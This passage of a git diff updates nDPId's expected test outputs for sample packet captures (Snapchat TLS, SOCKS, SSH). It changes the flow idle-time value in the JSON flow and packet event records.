+00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008131,"flow_last_seen":1431418008294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008133,"flow_last_seen":1431418008294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431417993318,"flow_last_seen":1431417995589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1671,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431418008133,"flow_last_seen":1431418008853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1069,"flow_tot_l4_payload_len":3005,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431418008131,"flow_last_seen":1431418008701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2439,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","packets-captured":56,"packets-processed":56,"total-skipped-flows":0,"total-l4-data-len":7115,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":24,"global_ts_msec":1431418008853} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 56/56 diff --git a/test/results/socks-http-example.pcap.out b/test/results/socks-http-example.pcap.out index c35bc9175..152257516 100644 --- a/test/results/socks-http-example.pcap.out +++ b/test/results/socks-http-example.pcap.out @@ -1,23 +1,23 @@ 00469{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"socks-http-example.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"socks-http-example.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1386004309468} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1386004309468,"flow_last_seen":1386004309468,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1386004309468,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1386004309468,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1386004309468,"pkt":"ABNyxPHhAB9b\/1HLCABFAABAxApAAEAGJ5MKtJy5CrSc+dEdBDiu6S7xAAAAALAC\/\/9AOQAAAgQFtAEDAwQBAQgKFh7eWwAAAAAEAgAA"} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1386004309469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1386004309469,"pkt":"AB9b\/1HLABNyxPHhCABFAAA8AABAAEAG66EKtJz5CrScuQQ40R2gPF01ruku8qASOJDLlAAAAgQFtAQCCApiX+0zFh7eWwEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1386004309469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1386004309469,"pkt":"ABNyxPHhAB9b\/1HLCABFAAA0BhZAAEAG5ZMKtJy5CrSc+dEdBDiu6S7yoDxdNoAQICsSxgAAAQEIChYe3ltiX+0z"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1386004309468,"flow_last_seen":1386004309473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1386004309473,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1386004312331,"flow_last_seen":1386004312331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1386004312331,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1386004312331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1386004312331,"pkt":"ABNyxPHhAB9b\/1HLCABFAABAPjdAAEAGrWYKtJy5CrSc+dEeBDi5gOhGAAAAALAC\/\/9xLQAAAgQFtAEDAwQBAQgKFh7peQAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1386004312331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1386004312331,"pkt":"AB9b\/1HLABNyxPHhCABFAAA8AABAAEAG66EKtJz5CrScuQQ40R7KitgsuYDoR6ASOJBMFQAAAgQFtAQCCApiX\/hhFh7peQEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1386004312331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1386004312331,"pkt":"ABNyxPHhAB9b\/1HLCABFAAA0IDxAAEAGy20KtJy5CrSc+dEeBDi5gOhHyorYLYAQICuTRgAAAQEIChYe6XliX\/hh"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1386004312331,"flow_last_seen":1386004312379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1386004312379,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1386004317979,"flow_last_seen":1386004317979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1386004317979,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53535,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1386004317979,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1386004317979,"pkt":"ABNyxPHhAB9b\/1HLCABFAABAZFdAAEAGh0YKtJy5CrSc+dEfBDg7J\/Q2AAAAALAC\/\/\/NpwAAAgQFtAEDAwQBAQgKFh7\/ZwAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1386004317980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1386004317980,"pkt":"AB9b\/1HLABNyxPHhCABFAAA8AABAAEAG66EKtJz5CrScuQQ40R8tB48eOyf0N6ASOJB5EQAAAgQFtAQCCApiYA5xFh7\/ZwEDAwc="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1386004317980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1386004317980,"pkt":"ABNyxPHhAB9b\/1HLCABFAAA0jiVAAEAGXYQKtJy5CrSc+dEfBDg7J\/Q3LQePH4AQICvAQgAAAQEIChYe\/2diYA5x"} -00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1386004309468,"flow_last_seen":1386004309478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1754,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1386004312331,"flow_last_seen":1386004312384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1770,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} -00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1386004317979,"flow_last_seen":1386004317989,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1763,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53535,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} -00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1386004317979,"flow_last_seen":1386004317989,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1763,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53535,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1386004309468,"flow_last_seen":1386004309468,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1386004309468,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1386004309468,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1386004309468,"pkt":"ABNyxPHhAB9b\/1HLCABFAABAxApAAEAGJ5MKtJy5CrSc+dEdBDiu6S7xAAAAALAC\/\/9AOQAAAgQFtAEDAwQBAQgKFh7eWwAAAAAEAgAA"} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1386004309469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1386004309469,"pkt":"AB9b\/1HLABNyxPHhCABFAAA8AABAAEAG66EKtJz5CrScuQQ40R2gPF01ruku8qASOJDLlAAAAgQFtAQCCApiX+0zFh7eWwEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1386004309469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1386004309469,"pkt":"ABNyxPHhAB9b\/1HLCABFAAA0BhZAAEAG5ZMKtJy5CrSc+dEdBDiu6S7yoDxdNoAQICsSxgAAAQEIChYe3ltiX+0z"} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1386004309468,"flow_last_seen":1386004309473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1386004309473,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1386004312331,"flow_last_seen":1386004312331,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1386004312331,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1386004312331,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1386004312331,"pkt":"ABNyxPHhAB9b\/1HLCABFAABAPjdAAEAGrWYKtJy5CrSc+dEeBDi5gOhGAAAAALAC\/\/9xLQAAAgQFtAEDAwQBAQgKFh7peQAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1386004312331,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1386004312331,"pkt":"AB9b\/1HLABNyxPHhCABFAAA8AABAAEAG66EKtJz5CrScuQQ40R7KitgsuYDoR6ASOJBMFQAAAgQFtAQCCApiX\/hhFh7peQEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1386004312331,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1386004312331,"pkt":"ABNyxPHhAB9b\/1HLCABFAAA0IDxAAEAGy20KtJy5CrSc+dEeBDi5gOhHyorYLYAQICuTRgAAAQEIChYe6XliX\/hh"} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1386004312331,"flow_last_seen":1386004312379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1386004312379,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1386004317979,"flow_last_seen":1386004317979,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1386004317979,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53535,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1386004317979,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1386004317979,"pkt":"ABNyxPHhAB9b\/1HLCABFAABAZFdAAEAGh0YKtJy5CrSc+dEfBDg7J\/Q2AAAAALAC\/\/\/NpwAAAgQFtAEDAwQBAQgKFh7\/ZwAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1386004317980,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1386004317980,"pkt":"AB9b\/1HLABNyxPHhCABFAAA8AABAAEAG66EKtJz5CrScuQQ40R8tB48eOyf0N6ASOJB5EQAAAgQFtAQCCApiYA5xFh7\/ZwEDAwc="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1386004317980,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1386004317980,"pkt":"ABNyxPHhAB9b\/1HLCABFAAA0jiVAAEAGXYQKtJy5CrSc+dEfBDg7J\/Q3LQePH4AQICvAQgAAAQEIChYe\/2diYA5x"} +00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1386004309468,"flow_last_seen":1386004309478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1754,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1386004312331,"flow_last_seen":1386004312384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1770,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} +00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1386004317979,"flow_last_seen":1386004317989,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1763,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53535,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} +00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1386004317979,"flow_last_seen":1386004317989,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1763,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53535,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","packets-captured":46,"packets-processed":46,"total-skipped-flows":0,"total-l4-data-len":5287,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1386004317989} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 46/46 diff --git a/test/results/ssh.pcap.out b/test/results/ssh.pcap.out index 376a6e63e..1fded3fa3 100644 --- a/test/results/ssh.pcap.out +++ 